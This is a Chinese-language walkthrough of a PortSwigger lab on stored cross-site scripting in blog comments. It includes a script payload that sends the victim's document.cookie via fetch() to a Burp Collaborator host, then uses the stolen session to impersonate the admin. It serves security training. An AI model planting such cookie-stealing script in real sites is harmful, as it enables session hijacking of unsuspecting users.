Lab: Exploiting cross-site scripting to steal cookies:利用XSS窃取Cookie
靶场内容
本实验包含博客评论功能中的存储型 XSS漏洞。一个模拟的受害者用户在发布后查看所有评论。为解决实验室,利用该漏洞窃取受害者的会话cookie,然后使用该cookie来冒充受害者。
注意
为了防止 Academy 平台被用来攻击第三方,我们的防火墙会阻止实验室与任意外部系统之间的交互。要解决实验室问题,您应该使用 Burp Collaborator 的默认公共服务器 ( burpcollaborator.net)。
一些用户会注意到这个实验室有一个不需要 Burp Collaborator 的替代解决方案。然而,它远没有泄露 cookie 那么微妙。
解决方法
- XSS窃取Cookie老生常谈了,最喜欢用的就是窃取Cookie了
- 这个靶场还是很细的:
- 找到一个评论区,将JavaScript代码复制到评论区
<script>
fetch('https://8r0adoyya8wnsy5t6m21h3twenkd82.burpcollaborator.net', {
method: 'POST',
mode: 'no-cors',
body:document.cookie
});
</script>
- fetch里面的URL内容是Burp Collaborator Client出来的payload
- 之后打开Burp Collaborator Client,可以发现有个HTTP报文
- 点开它,里面是管理员的session
- 之后使用这个cookie去覆盖home页面的cookie就可以解决战斗了
Lab: Exploiting cross-site scripting to steal cookies:利用XSS窃取Cookie相关推荐
- XSSF - Cross Site Scripting Framework
2019独角兽企业重金招聘Python工程师标准>>> 跨站脚本框架 (XSSF) 是一个设计用来快速发现网站存在XSS漏洞的一个安全工具集. 该项目是为了验证网站存在的XSS漏洞及 ...
- Cross Site Scripting DOM攻击jQuery append() 的处理方法
做安全红线使用Fortify工具进行扫描时,jquery append会报Cross Site Scripting DOM风险.解决该问题有两种办法. 一.原生dom方式 使用JavaScript原生 ...
- 【常见Web应用安全问题】---1、Cross Site Scripting
Web应用程序的安全性问题依其存在的形势划分,种类繁多,这里不准备介绍所有的,只介绍常见的一些. 常见Web应用安全问题安全性问题的列表: 1.跨站脚本攻击(CSS or XSS, Cross Si ...
- XSS(Cross Site Scripting)攻击简介
环境 Ubuntu 22.04 IntelliJ IDEA 2022.1.3 JDK 17.0.3.1 Spring Boot 3.0.1 Firefox 108.0.2 问题和分析 在Intelli ...
- Reflected Cross Site Scripting (XSS)
前言 反射型XSS, 即 Reflected Cross Site Scripting (XSS), 攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的 页 ...
- Xss-reflected/stored跨站脚本分析(Cross site scripting)
Xss-reflected/stored跨站脚本分析(Cross site scripting) 基础知识 针对Dom - dochtml Url概念:协议+网址/dns+端口+路径 XSS原理:对U ...
- DVWA V1.9:Reflected Cross Site Scripting(存储型XSS)
DVWA V1.9:Reflected Cross Site Scripting(存储型XSS) 存储型 XSS 介绍 Low 级别 核心代码 官方提示 漏洞利用 Medium 级别 核心代码 官方提 ...
- 靶场练习Exploiting cross-site scripting to steal cookies
复制Burp Collaborator客户端中的地址 到网页的靶场把框中地址替换 将'修改过的的代码提交到网页,Burp Collaborator客户端中会出现HTTP请求,请求内容,还有盗取到的co ...
- CHECKMARX安全漏洞检测防止XSS(Cross Site Scripting)跨站脚本攻击
CHECKMARX安全漏洞检测防止XSS跨站脚本攻击 总结CHECKMARX软件安全检测报告高危风险漏洞处理方式 高危警告内容 This can enable a Reflected Cross-Si ...
最新文章
- React系列——React Context
- 用户金字塔模型详解及在实际运营工作中的意义
- GridView中的CheckBox单击事件(oncheckedchanged)
- [数论-欧拉函数的应用]NEFU 1115
- 我的程序员之路(4)——工作半年
- vue开发中遇到的问题
- 计算机打印指定测试页到文件夹中,上海计算机等级一级考试复习指导.pptx
- 利用ENVI自带全球DEM数据计算区域平均高程
- TbSchedule的简单使用及其配置
- 一个专门下载全球气象站数据的网站(包括中国700多个站)
- Mac OS 系统的发展历史
- php元换成万元,元换算万元(元换算成万元换算器)
- C++第2周项目2——读取数据到结构体数组
- word中如何删除某一页上的页眉
- Jenkins——持续集成及Jenkins介绍和安装配置(插件,用户权限,凭据,Maven安装打包,配置tomcat用户权限)
- 远程连接腾讯云MySQL数据库
- 照度稳定可调LED台灯
- 将打开网页以网页 仅HTML,网页保存的不同方法
- 知识管理:如何让“隐形的翅膀”飞起来?
- 解决vc6卡死的办法就是打上官方的原版VC6sp6补丁|VS6sp6补丁